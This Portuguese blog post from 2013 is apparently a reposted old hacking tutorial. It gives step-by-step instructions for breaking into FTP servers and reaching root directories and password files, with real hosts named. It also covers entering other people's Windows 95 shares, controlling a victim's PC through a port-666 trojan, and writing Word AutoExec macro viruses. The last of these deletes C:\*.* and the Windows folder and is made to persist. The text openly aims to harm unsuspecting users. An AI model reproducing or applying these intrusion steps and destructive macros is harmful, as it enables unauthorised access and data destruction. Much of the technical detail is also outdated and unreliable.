Arquivo do blog

Pesquisar no blog

Total de visualizações

sexta-feira, 1 de fevereiro de 2013

Em primeiro lugar quero deixar bem claro que não me responsabilizo por qualquer acto cometido por informações extraídas destes documentos. Tudo o que você fizer é de sua inteira responsabilidade.

  Saber de uma determinada matéria (seja ela qual for) não é nem nunca foi crime.

        
    1º) Várias são as fantasias e a imaginação das pessoas sobre as diversas figuras  assustadoras que navegam no mundo virtual. Vamos começar por definir o que são e quem são estas figuras:

    Hacker: Aquele que tem conhecimentos profundos de sistemas operacionais e linguagens de programação. Conhece as falhas de segurança dos sistemas e está sempre à procura de novas falhas para posterior invasão. Utiliza os seus conhecimentos sem praticar o mal.

     Cracker:  O mesmo que "hacker", com a diferença de utilizar seus conhecimentos para o "mal". Destruir e roubar são as suas palavras de ordem.

     Lamer: É na verdade o chamado otário. Cada um acha uma pessoa otária por um motivo. Mas neste caso, é otário, porque chateia os outros. Anuncia aos quatro cantos as burrices que faz, e acha-se o máximo.

     Wannable: É o principiante que já aprendeu a usar os programas preparados pelos verdadeiros "hackers".

     Cavalo de Tróia (Trojan Horse): Semelhante ao famoso presente dos troianos, onde dentro do belo cavalo de madeira, estavam escondidos centenas de soldados prontos para atacar a cidade presenteada, programas úteis ou inúteis, ou simples jogos, possuem dentro deles, códigos capazes de não só executar a função proposta, como também, destruir, armazenar, ou copiar informações do sistema. Temos como exemplo, programas que imitam "login" de um provedor e armazenam esta informação em locais onde posteriormente o "curioso" poderá recuperá-la facilmente..
 
     Backdoors: São passagens secretas, ou "porta dos fundos", isto é, senha secreta criada pelo autor do "software", não documentada, é claro, que independente do administrador do sistema pode ser usada para acessar ilimitadamente a todos os recursos disponíveis. Farejamento de Redes: utilizando-se do empacotamento das mensagens nas redes de computadores, programas especialistas procuram neles palavras como "password" e "senha". Quando encontradas, o programa copia o pacote e envia-o para o computador do "hacker", que então se utiliza de técnicas próprias para tentar descodificá-las, pois as senhas estão todas “criptografadas".

     Invasão de servidores:  Através de "ftp" anónimo, pode-se roubar o arquivo que contêm as "passwords" dos usuários e, através de técnicas de tentativa de "decriptografias", obter "passwords" deste provedor.

    2º) Invasões
   a) Invasão por FTP:           
 
     Para Hackear em FTP, primeiro você deve saber o endereço do Host ou seu IP, para isso use o IPSCAN, digitando o IP Principal do Host:
    Lista de Alguns FTP's :
    ftp.mandic.com.br    ftp.bestway.com.br    ftp.internetclub.com.br    ftp.netscape.com    ftp.angelfire.com
    Let's HaCk !!!
    Vá ao MS-DOS e digite FTP, ao aparecer o prompt ftp>, digite OPEN, irá abrir um outro Prompt (to), digite o nome do host ou o IP, tipo (to) ftp.mandic.com.br. Ao conectar, ele pedirá a senha e a Password, tente usar os passwords UNIX, se não der você deve entrar INVISÍVEL!
 
      Como entrar Invisível?
    No login pressione ENTER, no password pressione novamente ENTER, irá aparecer o prompt ftp> novamente...., ai é só digitar... quote user ftp , pressione ENTER e digite: quote cwd ~root,  pressione ENTER novamente e digite: quote pass ftp
    Pronto, você está Hackeando... Mas tem um porém..., se escrever amensagem : user restriction aplly, você não esta Hackeando.., pois estáaplicada a protecção, para isto tente com outro user tipo quote cwd ~sys eos outros da lista UNIX....
   
    Meu Deus... eu entrei e agora o que faço? 
   
    Ao entrar você vai estar no Directório do login, tipo \home\root\,
    Dê cd\etc e você vai estar no lugar certo. Aí é consigo, descubra o quefazer. Se você tiver o arquivo de senhas, este vai estar criptografado, você vai precisar de um aplicativo para o descriptografar, tipo o Crack Jack .
 
    Não me responsabilizo por actos cometidos nos hosts... O problema é de quem hackeia, e não meu. Tome cuidado e nunca apague nada!!!
 
 
 
    b) Invasão por IP: 
 
     Todos os que utilizam a rede Dial-Up do Win95 (em desuso) para a sua conexão com a internet podem estar a correr sérios riscos a não ser, é claro, que assim se conectem propositadamente, com intenções"diversas". Utilizar-se de uma conexão PPP do Win95 num provedor de acesso, significa estar a disponibilizar o seu computador a todos os usuário da internet. Mesmo sem o compartilhamento de arquivos, existem diversas ferramentas que permitem a outra pessoa conectar-se ao seu computador caso você esteja a utilizar esse tipo de conexão. Conecte-se à Internet utilizando a rede Dial- Up do Win95. Se o seu provedor não disponibilizar uma conexão do tipo PPP, estas dicas não funcionarão. Verifique antes, se você possui os drivers  - clientes para redes Microsoft -. Caso não estejam instalados, instale-os através do Painel de Controlo, no ícone Redes. Verifique também se o compartilhamento de Arquivos e Impressoras está instalado. Se estiver, você estará sujeito a que outra pessoa se conecte ao seu computador simplesmente sabendo o seu IP. Se bem que, para aqueles que já sabem, existem mil maneiras diferentes de se "burlar" a fraquinha segurança do Win95. Para você poder encontrar outros computadores compartilhados, você deve configurar WINS LMHOSTS. O WINS é utilizado para localizar os computadores com IP fixo. O LMHOSTS , é accionado automaticamente na procura de computadores que possuem IPs dinâmicos.
  
     Configurar essas opções é simples. Vá ao Painel de Controlo e abra Rede. Verifique as propriedades do protocolo TCP/IP. Aí você encontrará a opção para activar a resolução WINS. No caso de você não conhecer nenhum servidor WINS, utilize 204.118.34.6 como primário e 204.118.34.11 como secundário. Estes servidores são dos E.U.A, e são gratuitos. Caso queira outros endereços, utilize um dos mecanismos de busca na Internet. Para configurar o LMHOSTS, você precisa de criar um arquivo de texto simples, utilizando-se até mesmo o Bloco de Notas do Windows. O arquivo criado deve chamar-se LMHOSTS. É nesse arquivo que ficarão os endereços de IP e os nomes dos computadores que você terá acesso. Para localizar um determinado computador, você digita o seu número de IP e a seguir a sua NetBios, na mesma linha, separados por um espaço. Se você executar o programa NBSTSTAT, seguido da opção-N, você obterá essa lista, com o nome e o IP do seu computador sempre sendo o primeiro da lista, seguido das outras máquinas disponíveis, tudo numa janela do MS-DOS. Através do Explorer você poderá ver os computadores disponíveis na rede, dos quais você ainda poderá utilizar os discos, mapeando-os, o que os tornará unidades do seu computador.
 
 
   c) Invasão pela porta 666
  
      É uma invasão fácil, mas no entanto, você irá precisar do programa Aabout . E a víctima também.
    Procedimento:
    Primeiro você deve contactar a vítima e fazê-la executar o programa Aabout, depois entre no telnet do Windows (C:\windows\telnet.exe). Vá ao menu Conectar e clique em Sistema Remoto. Vai aparecer uma tela para o login. Como host, coloque o IP dinâmico da vítima e como porta, digite 666.   Clique em conectar. No login, digite a palavra gr! (é 'gr' com o ponto de exclamação)
    Agora aparece um PROMPT, no qual você tem controle total sobre o PC da vítima.   Use os comandos do DOS.

      3º) Fazer vírus de macro:
 
    Ainda hoje existe muita gente que só é capaz de abrir o Word, editar,negritar, sublinhar e mandar imprimir. Muitos milhares de pessoas só sabemmexer no básico mesmo. Eles nem imaginam o que existe por de trás desteriquíssimo processador de texto.
    Esta matéria tem como objectivo fazer desde pequenas até grandessacanagens com usuários burros.
PS: Software/versão abrangida: Word da Microsoft, versões 6 (win3.11)e 7.0 (win95).
    O Word possui um arquivo chamado "normal.dot" onde estão todasas configurações padrão do Word. Se por algum motivo este arquivo forapagado do computador, o Word cria-o outra vez automaticamente quando for reiniciado.
 
Níveis de sacanagem :
Nível 1..... Apenas uma brincadeiraNível 2..... Apenas uma brincadeira de mau gostoNível 3..... Não é mais brincadeira!!!
 
Primeiro você precisa de criar uma macro... siga os passos:Entre no Word, feche a janela de documento, não deixe nenhum documento aberto(activo), clique em Arquivo(File) depois Macro, coloque no nome da macro "AutoExec"(obrigatório) este macro é iniciado todas as vez que o Word for iniciado, depois clique em 'Criar', delete as duas linhas que tiverem  (Sub MAIN e End Sub) e cole a rotina que está mais abaixo.
    PS: Existem outras formas/meios de criar uma macro, mas esta é mais simples.
   
 
    Nível 1
   
    O nível 1 serve para você dar nas vistas, mostrando que entende do Wordmelhor do que ninguém.    Cada vez que o usuário iniciar o Word receberá uma mensagem de alertaou qualquer outra mensagem que você queira. Veja abaixo.
    Sub MAIN    MsgBox "Você ‚ é otário! Eu não irei prosseguir com o sistema", "Microsoft Word", 5    MsgBox "Usuário Pirata Detectado", "FATAL ERROR", 16    MsgBox "Vai dormir e deixa-me descançar ", "Net Killers", 64    End Sub
 
 
Nível 2
    O Nível 2 é para deixar o usuário irritadíssimo.    No corpo da macro cole este texto abaixo:
    Sub MAIN    ArquivoNovoPadrão    Inserir "Shadow"    ArquivoNovoPadrão    Inserir "Net"    ArquivoNovoPadrão    Inserir "Killer"    ArquivoNovoPadrão    Inserir "Shadow Net Killer "    ArquivoNovoPadrão    Inserir "."    ArquivoNovoPadrão    Inserir "."    ArquivoNovoPadrão
    Inserir "."    ArquivoNovoPadrão    Inserir "."    ArquivoNovoPadrão
   Inserir "."    ArquivoNovoPadrão    Inserir "."    ArquivoNovoPadrão    Inserir "."    ArquivoNovoPadrão    Inserir "."    ArquivoNovoPadrão    Inserir "."    ArquivoNovoPadrão    Inserir "."    ArquivoNovoPadrão    Inserir "."    ArquivoNovoPadrão    Inserir "."    ArquivoNovoPadrão
    Inserir "."    ArquivoNovoPadrão    Inserir "."    ArquivoNovoPadrão
    Inserir "Shadow Net Killer "    End Sub
 
    Nível 3
    O Nível 3, bom este nível é pura sacanagem, com ele um simples clique do rato, etudo desaparece! Isso mesmo "del *.*" ou apenas os documentos, você é que escolhe.
    Sub MAIN    Kill "C:\*.*"    Kill "C:\WINDOWS\*.*"    Kill "C:\WINWORD\*.*"    End Sub
 
      Lembre-se de que estes macros, são gravados no arquivo default do Word, ou seja no 'normal.dot' se este arquivo for apagado, o Word cria-o outra vez automaticamente quando este for reiniciado, então se você for fazer estas sacanagens , proteja este arquivo, com o comando 'attrib +r'.

Nenhum comentário:

Postar um comentário